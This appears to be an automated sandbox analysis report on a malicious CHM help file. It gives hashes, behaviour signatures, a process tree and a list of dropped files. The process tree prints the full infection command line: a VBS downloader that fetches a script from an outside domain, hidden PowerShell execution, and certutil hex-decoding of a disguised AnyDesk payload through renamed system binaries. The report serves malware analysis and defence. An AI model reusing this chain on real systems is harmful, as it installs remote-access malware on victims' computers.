Resubmissions

15/01/2025, 16:20

250115-ttetnazjfk 3

15/01/2025, 15:00

250115-sdde8awlfy 10

Analysis

  • max time kernel
    36s
  • max time network
    40s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    15/01/2025, 15:00

General

  • Target

    AVSL-004673321/AVSL-004673321.chm

  • Size

    75KB

  • MD5

    98ea3f95d115f45570febc7a1872b1a7

  • SHA1

    a0985ee5bba1ed9ea30a4422c4007d35efde92d2

  • SHA256

    94492a4bfc8998c413bd30023b60427b394e5950eed33373f07faaf863c1d3f3

  • SHA512

    cbd8258068e3d25a682d9402a68adf5b9f8fba7414545b86af1e801c705dca4c77b5df77696b867cddf20f803f4cb599f472d3e76202df2dd1e75471b15afd86

  • SSDEEP

    1536:4pVD2VwAO+rou4327/9AbCtkFLStN1osGQPGYQ+yV:uVgbO+rv79kCOUbKnQDQ+C

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 7 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\AVSL-004673321\AVSL-004673321.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
      2⤵
      • Hide Artifacts: Hidden Window
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\system32\extrac32.exe
        extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
        3⤵
        PID:2264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Users\Public\ript.exe
          "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd
          4⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:2144
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Windows\system32\cmd.exe
          cmd /c ""C:\Users\Public\df.cmd" "
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1176
          • C:\Windows\system32\extrac32.exe
            extrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"
            5⤵
            PID:2916
          • C:\Windows\system32\extrac32.exe
            extrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
            5⤵
            PID:1904
          • C:\Windows\system32\extrac32.exe
            extrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"
            5⤵
            PID:1704
          • C:\Users\Public\alpha.pif
            C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Public\df.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1072
            • C:\Users\Public\phf.pif
              C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Public\df.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
              6⤵
              • Executes dropped EXE
              PID:1636
          • C:\Users\Public\alpha.pif
            C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1972
            • C:\Users\Public\phf.pif
              C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
              6⤵
              • Executes dropped EXE
              PID:2252
          • C:\Users\Public\awpha.pif
            "C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif
            5⤵
            • Executes dropped EXE
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:2356
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 5
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1956
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM hh.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2656

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize: 7KB
    MD5: e0466a312422e51d36a14f724bf97927
    SHA1: ca26210c46eb3a8410b6bf87508b33329adbaec4
    SHA256: 64276bcf27d041cf32628c3b70c6a7634e4bd6593a1168d654873aedafd21bdb
    SHA512: 9360c99461fa31b5aeecbc65a1cd7cd884d7f29fa62d7206c36d7c035cd656911068577a613f6b889d225b9768b14e73ebc3da55adafb41f75754d40f41d362f

  • C:\Users\Public\AnyDesk.avi
    Filesize: 1.6MB
    MD5: 4b6b8688bffe5b3ce33d16f6fb02e0ec
    SHA1: f287b2320d312ee1ec4ad30d251f837860b23699
    SHA256: b8d9fedf4ee1a38007dbd30c7035e0051221689bcf24f1b309a20aea9a0022df
    SHA512: 9aedba5b7dadde70dc5bcd2063d9e6ccbf26f2137890c7ed2214b875bd000df85a54622fcaff1189d4fec04e3a9a705182ff79aa919e88f0193b0b3724b9aafe

  • C:\Users\Public\aloha.vbs
    Filesize: 194B
    MD5: 71efa4ec6c67fa5665b1d0c64d60fc25
    SHA1: f546eda2b94df327b7ad5fa5bb0ba20cd37b2623
    SHA256: 08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898
    SHA512: 7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

  • C:\Users\Public\awpha.pif
    Filesize: 43KB
    MD5: 1b79536d9033da4ee3b8b21354dbd391
    SHA1: 09b4a38f0a6960768f26ef86a30bc0167e690f50
    SHA256: 385b4553cbef207d9c5e466002940c205d51b1e2095fa8b442de1f64d6512f95
    SHA512: 2475b0352929d87090d92d1d6b2cb3db97632d780bf898c1c44f9169d513752f1ef26df476f9eb8487e75cbdc5c5584e3a4470cfedcea709a39cd82a59c190ae

  • C:\Users\Public\df.cmd
    Filesize: 2.3MB
    MD5: 800b673badb63ad57e96324389a9f77b
    SHA1: e72da9e4dbe7f584a449d434e63ad71a2d4b74d0
    SHA256: 60412b1b9b974a1309f7209def199a77e6d087f67d58018f26d035505f5cc7a6
    SHA512: 0a4c0fc2cf809f5a520d9484b519b960fedbfe379129a454db91b73dc97a30bb8f581644e7c3187a46e4333bf3c7d02db3baea8903fa66b8089da582233b5618

  • C:\Users\Public\phf.pif
    Filesize: 1.1MB
    MD5: ec1fd3050dbc40ec7e87ab99c7ca0b03
    SHA1: ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
    SHA256: 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
    SHA512: 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

  • C:\Users\Public\ript.exe
    Filesize: 152KB
    MD5: 791af7743252d0cd10a30d61e5bc1f8e
    SHA1: 70096a77e202cf9f30c064956f36d14bcbd8f7bb
    SHA256: e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15
    SHA512: d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

  • \Users\Public\alpha.pif
    Filesize: 337KB
    MD5: 5746bd7e255dd6a8afa06f7c42c1ba41
    SHA1: 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8
    SHA256: db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
    SHA512: 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

  • memory/1616-53-0x000000001B270000-0x000000001B552000-memory.dmp
    Filesize: 2.9MB

  • memory/1616-54-0x00000000022A0000-0x00000000022A8000-memory.dmp
    Filesize: 32KB

  • memory/2520-13-0x000000001B3B0000-0x000000001B692000-memory.dmp
    Filesize: 2.9MB

  • memory/2520-14-0x00000000024E0000-0x00000000024E8000-memory.dmp
    Filesize: 32KB